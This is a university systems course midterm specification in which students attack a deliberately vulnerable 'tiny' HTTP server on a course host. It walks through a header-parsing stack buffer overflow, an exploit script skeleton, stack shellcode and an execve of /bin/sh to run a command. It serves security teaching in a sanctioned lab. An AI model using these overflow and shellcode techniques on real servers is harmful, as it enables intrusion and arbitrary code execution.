This midterm is nocollab. You may not discuss anything about it with other students. You may get ticketing help from course staff, but we will not be holding office hours this week. The code required for this midterm is a smallish number of lines, but the conceptual understanding is very important. We are happy to help significantly, but we do not want to be pressured to look at code.
Introduction
Over the past few weeks, we have discussed representation, assembly, the stack, and buffer overflows. In this midterm, you will put all of this together to hack into one of our servers.
Please be advised: At the end of this midterm, an arbitrary subset of students will be asked to complete an oral interview explaining their code as part of the assignment. Students could be selected for any reason, including to ensure understanding or because course staff thinks the code is really cool.
These interviews are expected to last about 15 minutes, and your code will be available to you throughout. If you are called to interview, course staff will contact you to schedule a time, and your grade will be held until the interview is completed.
Setup
Like usual, you should register for the assignment by going to https://grinch.caltech.edu/register which will create you a repository on gitlab with the starter code.
The Scenario
John is a recently graduated CS major who is working for Adventures Incorporated (tm). He was tasked with creating their website which he finally got running here:
http://adventure.com.puter.systems/index.html
Unfortunately, John didn’t go to Caltech or learn about systems; so, he used a small HTTP server that he found on the internet called tiny
:
https://gitlab.caltech.edu/john/adventures-tiny-server
Even more unfortunately, John was having problems getting the “save progress” feature working. So, he wrote some debugging code and accidentally left it in production…
Your Task
Your task for this midterm is to write several buffer overflow exploits in tiny
to get various forms of your password on the server. By the end of this midterm,
you will have arbitrary code execution on the remote machine. Please remember the honor code here–you wil be able to delete other students’ progress, but we’re expecting you to
not do this. In an effort to make this as real as possible, we are going to rely heavily on the honor code for this one. Please don’t take advantage.
The open-ended questions in this document are part of your grade on this midterm. Make sure to submit your answers on Gradescope!!! You may submit as many times as you want.
Orienting Yourself
The first thing you’ll have to do for this assignment is explore the webserver you’ll be hacking. tiny
is set up to give a directory listing if you access a page that
matches the structure of the files on the server. This is an standard web server feature that should usually be turned off, but not on John’s website! If you access the root
(the website without index.html
), it will list the root directory. Several directories are “forbidden” (namely, config
and tokens
), and these are the ones you will be hacking.
The webserver has been run from the /hackme/tiny
directory. For example, if you run ls
on the config
directory, you’d get the following:
All the other files in /hackme/tiny
are also useful, but we’ll let you explore them yourself.
In particular, you might find it useful to download the binary itself (consider using wget URL_FOR_TINY
) which John helpfully called tiny
and left in the root directory of the
website. This binary should run and be gdb
-able on labradoodle
.
Throughout this midterm, we will refer to your “password”. All passwords for this midterm are 10 characters long. Click Here to fill in your username and password throughout this specification.
There are three “stages” to this midterm, and we strongly recommend you complete them in order:
- Put a token in the
/hackme/tiny/tokens
folder with no contents and a name computed bysha256
(“adamtoken=PASSWORD
”). - Put a token in the
/hackme/tiny/tokens
folder with no contents and a name computed bysha256
(ADMIN_PASSWORD
+ “token=PASSWORD
”). WhereADMIN_PASSWORD
is the contents of the/hackme/tiny/config/admin_token
file. - Put a token in the
/hackme/tiny/tokens
folder with the contents computed bysha384
(“YOUR_USERNAME
”) and a name ofPASSWORD
.
The attacks necessary to get these results get increasingly difficult. We will, however, explain the exploits you should be writing for each stage. Determining what code is exploitable is not a major goal of this midterm; instead, we will focus on actually writing the attacks once an exploit has been identified.
HTTP Requests and Responses
When you type a URL into your browser, it communicates with the remote server via an “HTTP request” which looks like this example:
GET / HTTP/1.1
Host: www.example.com
Connection: close
This request is made up of several sections:
- The “status line” which is itelf made up of three pieces:
- The “method” (or type) of the request. We will only be dealing with
GET
requests which are what run when you type a URL into Chrome. - The “URI” (or path) of the request. This tells the server what to serve back.
- The protocol name. We will be using exclusively
HTTP/1.1
.
- The “method” (or type) of the request. We will only be dealing with
- A list of “headers” that provide information to the server about how to serve the content. The HTTP specification requires a
Host
line, buttiny
will ignore all headers anyway; so, there is no reason to send one. - An empty line that indicates the end of the headers.
- Arbitrary data that is used as the “body” of the request. For our purposes, this is where the password will be read from.
As a raw string, the HTTP request above looks like:
b"GET / HTTP/1.1\r\nHost: www.example.com\r\nConnection: close\r\n\r\n"
Notice the \r\n
after the first line, the \r\n
between headers, and the trailing \r\n\r\n
before any data (of which this request has none).
Also notice the b
in front of the string; this indicates that it is a byte string. For our purposes, all you really need to know is (1)
we should always use byte strings when sending over a connection, and (2) you can concacentate them like regular strings.
This midterm will require manipulating raw HTTP requests. So, we have drafted a little script in python3
for you which sends a request to www.example.com
and prints out the data
sent back. Note that this script isn’t actually complete. You need to put the pieces of the request together in the request
line.
example-request.py
import socket
METHOD = b"GET"
URL = b"/"
HEADERS = b"Host: www.example.com"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# By default, web browsers request unencrypted websites on port 80.
# We want to simulate a "default" request here.
client.connect(("example.com", 80))
request = b"PUT TOGETHER THE PIECES HERE. DON'T FORGET TO USE \r\n's!"
print(request)
client.send(request)
response = client.recv(4096)
print(response.decode())
Task 0.
Start by completing the example-request.py
script (given above). Then, try running it on labradoodle
to see what the output looks like, because you will be looking at a lot of output like it…
Note that if your output says “HTTP Version Not Supported”, you’ve done something wrong!
Uh Oh, Buffer Overflow…
Consider the following snippet of code which can be found in eat.c
(part of the tiny
webserver). Note that HEADERS_SIZE
is a constant defined elsewhere.
eat.c
int eat_headers() {
char garbage[HEADERS_SIZE];
i = 0;
garbage[0] = getc(stream);
i++;
garbage[1] = getc(stream);
i++;
garbage[2] = getc(stream);
i++;
garbage[3] = getc(stream);
while (garbage[i - 3] != '\r' || garbage[i - 2] != '\n' ||
garbage[i - 1] != '\r' || garbage[i] != '\n') {
i++;
garbage[i] = getc(stream);
}
return 1;
}
As advertised, this function “eats” (reads and discards) the HTTP headers of a connection called stream
. tiny
is not written very well,
and stream
and i
are both global variables. Unfortunately (or fortunately for us!), this code is written poorly and is susceptible to a buffer overflow attack!
Converting an Address Into Bytes
When writing exploit strings, it is often very important to convert between a numerical address and the corresponding string made up of raw bytes.
Hex Number: | 0xdeadbeef |
Raw String: | b'\xef\xbe\xad\xde\x00\x00\x00\x00' |
Notably, the order of the bytes in the raw string is backwards, because we’re working on a little-endian machine. This can be very annoying to do by hand; luckily, python3
gives us a function that makes it easy:
def to_bytes(i, l=8):
return int.to_bytes(i, length=l, byteorder='little')
We strongly recommend that any python
scripts you write or use for this midterm are executed with python3
NOT python2
!
From HTTP Request to Exploit
All three attacks you will write will involve preparing exploit strings of varying complexities. Usually, they will consist of two pieces: (1) padding bytes
and (2) a return address. We will send these in the headers of the HTTP requests, because eat_headers
has the bug we’re exploiting. All together,
the core of the script you’ll be writing looks like this:
sploit.py
import socket
# Method should always be get
METHOD = b"GET"
# We don't care what URL we're grabbing; they all have the possibility of exploit...
URL = b"/"
# Figure out how many bytes we need to pad until we get to the return address
# on the stack. (Hint: It's not 10...)
N = 10
PADDING = b"\xff" * N
# Fill this in with the address you actually want instead of `0xdeadbeef`
ADDRESS = to_bytes(0xdeadbeef)
# The "exploit string" is what we send in as the headers
HEADERS = PADDING + ADDRESS
# The functions we call will often look in the request's data for a password.
# So, we send it here.
DATA = b"YOUR_PASSWORD"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(("adventure.com.puter.systems", 80))
request = b"PUT TOGETHER THE PIECES HERE. DON'T FORGET TO USE \r\n's!"
print(request)
client.send(request)
response = client.recv(4096)
print(response.decode())
Stage 1: Return to a function (20 points)
In this exploit, you will change a return address on the stack to make tiny
execute a different function of your choice.
Task 1.
Your goal in this first exploit is to put a token in the /hackme/tiny/tokens
folder with no contents and a name computed by
sha256
(“adamtoken=PASSWORD
”). Luckily, there is a function in the source code of tiny
(utils.c
, specifically) that does precisely this.
Somehow get the source file utils.c
, and find a function that does what you want (Hint: It’s called update_stage1_grade
).
Then, download the tiny
binary and figure out (1) where the function you want to call is
located, and (2) how big the buffer you’re exploiting is by using a tool like cs24-dasm
.
Then, create an exploit string which overwrites the return pointer with the address of the function you want to call and send it to the server.
tiny
will read the “body” of the request as your password; so, make sure to include the DATA
variable at the very end of your request (after the \r\n\r\n
).
The “padding” in your exploit may not be what it initially looks like it should be. When trying to figure out how much padding to use, we’d recommend looking at the first location on the stack that the code reads into.
If you’ve successfully made a correct exploit, the server will respond with a message indicating so.
After you think you’ve send it correctly, go to http://adventure.com.puter.systems/debug.html and enter your password to check that the system registered it.
Stage 1.5: Running Your Own tiny
(0 points)
We will need to get some information about tiny
as it executes; so, we’ll have to get our own instance of tiny
running on labradoodle
.
Making tiny
Executable
In the last stage,
you downloaded tiny, but if you tried to run it you might have gotten an error message (-bash: ./tiny: Permission denied
). This is because we need to mark the file as “executable”.
To do this, run chmod +x tiny
. Now, you’ll be able to run tiny
on your own. Note that tiny
takes an argument which is the port to run it on. Choose (and remember!) some number
larger than 9000 as this argument. However, to capture debugging information, we’ll need to use a debugger.
Using gdb
to inspect tiny
while it runs
We have a short tutorial for gdb
which can be found here which we recommend you read before continuing.
Here is an example gdb
session during which we run tiny
and determine what address the clientaddr
variable in the accept_connection
function is stored at:
Why Bother?
In the next stage, we will need the address of the garbage
buffer in eat_headers
. The process to getting the address of this buffer
is very similar to our example. You should follow approximately the same steps with the following exceptions:
- Set a breakpoint on
eat_headers
instead ofaccept_connection
- After
run
ningtiny
ingdb
by typingrun PORT
, it will hang, because it’s waiting for a connection. You can create a connection by opening a new terminal (don’t close the old one!) and running the commandwget labradoodle.caltech.edu:PORT
- After execution stops, you will be in the
eat_headers
function and ready to print out the address of thegarbage
buffer.
Stage 2: Return to your own code (45 points)
In the first stage, we caused execution to jump to an existing function and run it. This is already really powerful, but we can do better! What if, instead of jumping to code that
exists, we jumped to our own code? In this exploit, you will cause tiny
to jump to code of your own design which will call several existing functions to complete your goal.
Shellcode
At its core, code is just executable bytes at a memory location. Remember that eat_headers
helpfully reads the bytes we send onto the stack.
So, is there any reason we can’t execute bytes on the stack? In the first attack, we replaced the return address with the address of a particular function, but this time,
we’ll replace it with the address where our code will be…on the stack. Just like you had to carefully count bytes to calculate where to put the address, this time you will need
to do a similar count to figure out where you’re putting your bytes that represent code. This will be some kind of offset from garbage
’s address as calculated in the previous stage.
The “code” that we write as an exploit is usually called “shellcode”; it’s named that way, because the goal of the shellcode is usually to start a shell. In stage 3, we will do exactly this!
(N.B. In the real world, a new protection (an “NX bit”) was put in place to avoid exactly what we’re about to do, but it’s turned off for the purposes of this midterm.)
Absolute Calls
You will likely find yourself trying to callq
a particular address in this exploit. Unfortunately, if you try this naively, like so:
bad-call.s
callq *$0xdeadbeef
You get the following output:
That is, you cannot directly jump to an immediate address. Instead, you must put it in a register first, like this:
better-call.s
movq $0xdeadbeef, %rax
callq *%rax
Note that you should use cs24-dasm
or gdb
to get the actual bytes of the shellcode exploit you write after compiling it with as
.
With a careful application of these concepts, you have enough to write this exploit!
Task 2.
Put a token in the /hackme/tiny/tokens
folder with no contents and a name computed by sha256
(ADMIN_PASSWORD
+ “token=PASSWORD
”).
Where ADMIN_PASSWORD
is the contents of the /hackme/tiny/config/admin_token
file.
To do this, you will first find a function that gets the admin token, and then feed it to another function that takes the sha256
of its arguments. Once again, you should
look in utils.c
for the requisite functions. Then, once you’ve found the functions, write assembly to perform the correct actions,
compile it with as
, put the exploit together, and send it to the server.
Stage 3: Execute a shell command (25 points)
Finally, you will implement the holy grail. In this exploit, you will force tiny
to run your shellcode to load and execute a shell with a bash
script of your own design.
In reality, this script could do anything you wanted. For the purposes of this midterm, it will create a file on the file system.
System Calls and the syscall
Instruction
A system call is a request to the operating system (specifically, the kernel) to complete an operation for the user program. You’ve used many system calls without knowing it;
all the file operations are, at their core, system calls, for example. We’ll talk much more about these later, but, for now, it suffices to know that if we want to execute a
program, we can ask the OS to do it for us using the execve
system call.
Because we’re writing shellcode, we need to know how to request a system call from assembly. To do this, one uses the syscall
instruction which behaves very similarly to
callq
except that it takes arguments in different registers. Every syscall
has a “number” that tells the OS which operation to complete. A full list can be found at
https://filippo.io/linux-syscall-table/. For our purposes, we will only care about exit
(which is #60) and execve
(which is #59).
Use the following registers to complete a syscall
:
Syscall # | Param 1 | Param 2 | Param 3 | Param 4 | Param 5 | Param 6 |
%rax |
%rdi |
%rsi |
%rdx |
%r10 |
%r8 |
%r9 |
Then, to complete an exit(0)
system call, we’d write the following x86-64 code:
movq $60, %rax ; use the exit syscall
movq $0, %rdi ; error code 0
syscall ; make syscall
The execve
System Call
To really understand what execve
is doing, we must understand processes which we won’t get to until later. So, we’ll provide a working definition that
will be enough to do the current assignment.
execve() executes the program pointed to by filename. This causes the program that is currently being run by the calling process to be replaced with a new program, with newly initialized
stack, heap, and (initialized and uninitialized) data segments. The execve
system call has the following signature:
int execve(const char *filename, char *const argv[], char *const envp[]);
-
filename
is the full path to the executable to run. -
argv
is aNULL
terminated array of strings indicating what arguments to runfilename
with. Note thatexecve
will expect the first argument to be a repeat of the path to the binary to execute) -
envp
is aNULL
terminated array of strings indicating the “environment” to run the program in. For our purposes, we will always pass in{NULL}
(i.e., an empty environment).
Notably, since we will be making a syscall
to execve
in assembly, we will have to manually set up all arguments (and their contents and pointers)! Getting those right will
be the hardest part of this exploit!
Shells and Shell Scripts
When you type into a terminal, there is a program (called a “shell”) which interprets what you write and executes the commands you write. (Incidentally, it does this using the execve
syscall from above…) Specifically, the shell program most commonly used is called sh
(or bash
) and can be found at /bin/sh
on most machines. This is the program that you will
be execve
ing using your h4x0r skillz! In particular, since you are trying to put a token with particular contents and password, the shell script you will want to run will be:
/bin/sh -c 'echo -n "USERNAME" | sha384sum > /hackme/tiny/tokens/PASSWORD'
Note that /bin/sh
is the name of the program and -c
and the rest of the line are its two arguments. Do not include the quotes in the second argument in your exploit.
That is, your arguments array to execve
should look like {"/bin/sh", "-c", "echo -n USERNAME | sha384sum > /hackme/tiny/tokens/PASSWORD", NULL}
.
As you have likely gathered at this point, you could send whatever command you wanted to do whatever nasty things you wanted on a machine if you can execve
/bin/sh
!
Putting it all together
Task 3.
Write shellcode that execve
’s /bin/sh
with the provided arguments (“shell script”). Then, force tiny
to execute your shellcode by returning to it like before. Your shellcode
should put a token in the /hackme/tiny/tokens
folder with the contents computed by sha384
(YOUR_USERNAME
) and a name of PASSWORD
.
Did you remember to submit your answers to the OpenEnded questions on Gradescope???
You must upload your code on GitLab by the due date. In particular, we will redownload your repository’s stage1.py
, stage2.py
, and stage3.py
and run them by themselves to verify your work for credit.
- Your script must connect to
adventure.com.puter.systems
and a port between10000
and10025
. - Your script should be able to run without any issues by itself.
- The script must be able to be ran without any arguments.
- No third-party imports or importing from other scripts.
- If you choose to do the extra credit, it should be in a separate file and not
stage3.py
.
Extra Credit: Proof of Arbitrary Code Execution (+5 points)
Given the third task gives you a shell, you can now do arbitrary code execution. To prove that you understand what you’ve done, add a new link to the index.html
page as well as a corresponding
directory and index.html
page for your link. Make sure to sign the page in some way that we’ll be able to figure out who you are.